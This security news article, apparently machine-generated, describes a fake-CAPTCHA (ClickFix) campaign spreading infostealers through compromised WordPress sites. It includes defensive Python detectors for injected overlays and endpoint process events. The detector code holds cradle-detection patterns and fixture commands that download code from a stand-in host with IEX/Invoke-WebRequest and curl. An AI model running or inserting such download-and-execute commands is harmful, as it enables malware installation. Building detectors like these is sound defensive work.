Ethical Hacking News
Malicious actors have compromised more than 250 WordPress sites worldwide and are using them to serve fake CAPTCHA prompts that trick visitors into installing infostealers, malware that harvests credentials and other sensitive data from the infected machine.
The attack chain is simple: a compromised WordPress site serves visitors a convincing fake Cloudflare CAPTCHA page, and that page talks the visitor into running a command on their own machine, which fetches the malware. The compromised sites belong to unrelated organizations, from regional media outlets to small business websites, which points to a highly automated operation rather than hand-picked targets. The infostealer harvests useful data from each infected machine, and the resulting logs are then sold on cybercrime marketplaces. The campaign has been active since at least December 2025 and affects more than 250 websites across at least 12 countries.
The cybercrime landscape continues to evolve, with new tactics and techniques being employed by malicious actors to compromise unsuspecting victims. A recent report from Rapid7 has shed light on a particularly insidious method of attack, where hackers exploit vulnerabilities in WordPress sites to spread infostealers via fake CAPTCHA prompts.
This article looks at how the attack works, the scope of the compromised websites, and what it means for security professionals and users alike.
CAPTCHA tests are a ubiquitous feature of the modern web, designed to tell human visitors from automated scripts, and most users click through them without a second thought. In this campaign, malicious actors imitate them to trick users into running malware on their own machines. The attack starts with the injection of malicious code into compromised WordPress sites; the injected code then serves visitors a convincing fake Cloudflare CAPTCHA page.
The page instructs users to copy a command and run it on their own machine, a step that ultimately triggers the download of credential-stealing malware. This is the now well-worn ClickFix social engineering playbook: the attacker does not need to exploit a bug on the victim's machine, but instead persuades the victim to execute the command themselves under the guise of fixing or verifying something on their system.
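For a site owner or responder who wants to check whether a WordPress page is carrying an overlay of this kind, the following is an added example for this article, not code from Rapid7 or from the campaign. It pulls the inline scripts, external script URLs and visible text out of a rendered page and looks for the ClickFix shape: a Cloudflare-styled "verify you are human" lure combined with JavaScript that writes a command to the clipboard, plus visible instructions to paste it into the Run dialog. The indicator patterns, the hostname `site.example` and the two HTML fixtures are constructed for the demonstration and are assumptions about how such pages typically behave; tune them against real samples before relying on them.

```python
"""Heuristic scan of a WordPress page for an injected fake-CAPTCHA (ClickFix) overlay.

Added example, not code from Rapid7 or from the campaign. The markers below are
assumptions about typical overlays (a Cloudflare-styled "verify you are human"
lure, JavaScript that writes a command to the clipboard, instructions to paste
it into the Run dialog); tune them against real samples before relying on them.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator patterns (assumptions, see module docstring).
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
VERIFY_LURE = re.compile(
    r"verify (?:you are|you're) (?:a )?human|checking your browser|ray id", re.I)
RUN_INSTRUCTION = re.compile(
    r"win\s*\+\s*r\b|\bpowershell\b|\bmshta\b|\bcmd(?:\.exe)?\b|ctrl\s*\+\s*v\b", re.I)


class _PageCollector(HTMLParser):
    """Collect inline <script> bodies, external script URLs and visible text."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # inline script bodies
        self.script_srcs = []  # values of <script src="...">
        self.text = []         # visible text nodes
        self._buf = None       # accumulates the current inline script body

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.script_srcs.append(src)
            else:
                self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
        else:
            self.text.append(data)


def scan_page(html, site_host):
    """Return a list of findings for one rendered page.

    site_host is the hostname the page was fetched from; scripts loaded from any
    other host are reported for review (legitimate CDNs show up too, so that
    entry is a review list, not an alert on its own).
    """
    page = _PageCollector()
    page.feed(html)
    page.close()
    findings = []

    for body in page.scripts:
        hits = [name for name, rx in (("clipboard_write", CLIPBOARD_WRITE),
                                      ("verify_lure", VERIFY_LURE),
                                      ("run_instruction", RUN_INSTRUCTION))
                if rx.search(body)]
        # A clipboard write alone is common (copy buttons); combined with lure
        # text or run instructions in the same script it is the ClickFix shape.
        if "clipboard_write" in hits and len(hits) >= 2:
            findings.append({"type": "inline_script", "indicators": hits,
                             "snippet": " ".join(body.split())[:80]})

    for src in page.script_srcs:
        host = urlparse(src).hostname
        if host and host != site_host and not host.endswith("." + site_host):
            findings.append({"type": "external_script", "src": src})

    visible = " ".join(page.text)
    if VERIFY_LURE.search(visible) and RUN_INSTRUCTION.search(visible):
        findings.append({"type": "visible_lure"})
    return findings


# Constructed fixtures (not real samples). CLEAN is an ordinary WordPress page;
# INJECTED carries a fake-verification overlay whose payload is a placeholder.
CLEAN = """<html><head><title>Site</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>var copyBtn = 1;</script></head>
<body><p>Welcome to our newsroom.</p></body></html>"""

INJECTED = """<html><head><title>Site</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example.invalid/loader.js"></script>
<script>
  var lure = "Verify you are human - Ray ID";
  var payload = "placeholder-command";  // a real overlay stages its command here
  document.addEventListener("click", function () { navigator.clipboard.writeText(payload); });
</script></head>
<body><div id="overlay">Verify you are human: press Win + R, then Ctrl + V and Enter.</div>
<p>Welcome to our newsroom.</p></body></html>"""

if __name__ == "__main__":
    for name, html in (("clean", CLEAN), ("injected", INJECTED)):
        print(name, scan_page(html, "site.example"))
```

Run it against the HTML your own site actually serves to an ordinary browser (curl with a browser User-Agent, or a saved page from the browser), not against the theme files on disk: injected code is often served conditionally, and a file-level check can miss it.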
The infected sites span a broad mix of organizations, including regional media outlets, small business websites and even the official webpage of a United States Senate candidate. The scale suggests that this is not someone manually breaking into websites one by one, but a heavily automated operation.
According to Rapid7 security researcher Milan Spinka, "The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort."
Once a victim follows the instructions on the fake verification page, the attack chain can install an infostealer – malware designed to quietly scoop up useful data from the infected machine. This typically includes browser-stored credentials, authentication cookies, cryptocurrency wallet information, and other bits of digital loot.
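On the endpoint, the moment to catch this is when the pasted command actually runs, before the infostealer is on disk. The following is an added example for this article, not Rapid7's detection logic: it scores process-creation events shaped like Sysmon event ID 1 (fields `Image`, `ParentImage`, `CommandLine`) for the ClickFix pattern, an interpreter or LOLBin spawned by explorer.exe (which is what the Win+R Run dialog produces) with a download cradle on its command line, and it expands `-EncodedCommand` payloads first so that a base64-obfuscated one-liner is inspected in the clear. The indicator lists, the sample events and the hostnames in them are constructed for the demonstration.

```python
"""Endpoint-side detection of the ClickFix step (a user pasting a staged command
into the Run dialog). Added example, not Rapid7's detection logic; field names
follow Sysmon event ID 1 and the indicator lists are assumptions to tune locally.
"""
import base64
import re

# Interpreters and LOLBins a pasted one-liner typically lands in (assumption).
CONSOLE_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                 "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
# The Run dialog (Win+R) and the File Explorer address bar both spawn children of explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
CRADLE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|frombase64string|https?://|certutil.*-urlcache", re.I)
HIDDEN_PS = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so that
    the cradle regex can inspect it; returns cmdline unchanged on failure."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons this process-creation event looks like ClickFix."""
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    cmdline = expand_encoded_command(event.get("CommandLine", ""))
    reasons = []
    if parent in RUN_DIALOG_PARENTS and image in CONSOLE_HOSTS:
        reasons.append(f"{image} launched from {parent} (Run dialog / address bar shape)")
    if CRADLE.search(cmdline):
        reasons.append("download cradle or inline execution in command line")
    if image in ("powershell.exe", "pwsh.exe") and HIDDEN_PS.search(cmdline):
        reasons.append("hidden-window / no-profile PowerShell switches")
    return reasons


def detect_clickfix(events, min_reasons=2):
    """Return (index, reasons) for every event with at least min_reasons indicators.
    A lone explorer.exe child or a lone URL on a command line is too common to alert on."""
    alerts = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if len(reasons) >= min_reasons:
            alerts.append((i, reasons))
    return alerts


def _enc(ps):
    """Encode a PowerShell string the way -EncodedCommand expects (fixture helper)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry). Only events 0 and 3 should alert;
# event 2 is a legitimate scheduled script and must stay quiet.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -enc "
                    + _enc("IEX (Invoke-WebRequest http://example.invalid/v).Content")},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c curl http://example.invalid/a.txt -o a.txt"},
]

if __name__ == "__main__":
    for idx, why in detect_clickfix(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], why)
```

The same logic translates directly into a SIEM rule; the part worth keeping is the parent-child pairing, since a URL on a PowerShell command line is routine in administration but explorer.exe launching an interpreter with a cradle is almost always a human pasting something they were told to paste.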
Those stolen credentials rarely stay with the original attacker for long. Infostealer logs are routinely packaged up and sold on cybercrime marketplaces, where other criminals can buy ready-made access to email accounts, corporate systems, and online services without having to break in themselves.
The campaign has been active in its current form since at least December 2025, although some of the infrastructure behind it, including domain registrations used in the attack chain, dates back to July and August 2025. Rapid7 has identified more than 250 compromised websites across at least 12 countries: Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK and the US.
Using compromised websites as the delivery mechanism gives the operators a useful layer of camouflage. Security tools and users alike are far less suspicious of well-known domains than newly registered malware sites, and the attackers get to piggyback on the reputation of whoever's unlucky enough to have their website hacked.
The weak point this campaign exploits is not a browser bug but a convincing page and a willing user. For security teams, the practical takeaways are to watch for the ClickFix execution pattern on endpoints and to treat an unexpected "verification" page on an otherwise legitimate site as a sign that the site itself has been compromised, not that the user's browser needs checking.
For users, the rule is simple: a real CAPTCHA never asks you to open a terminal, the Run dialog or PowerShell, and never asks you to paste and execute a command. Any page that does is malicious, however legitimate the site it appears on, and the right response is to close it and run nothing.
For site owners, the compromised sites are the delivery mechanism, so keeping WordPress core, themes and plugins patched and checking served pages for injected scripts matters as much as user awareness. Education reduces the number of victims; removing the injected code removes the lure.
Related Information:
https://www.ethicalhackingnews.com/articles/Crooks-Compromise-WordPress-Sites-to-Spread-Infostealers-via-Fake-CAPTCHA-Prompts-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/
https://www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/
https://thehackernews.com/2025/08/shadowcaptcha-exploits-wordpress-sites.html
Published: Tue Mar 10 13:46:49 2026 by llama3.2 3B Q4_K_M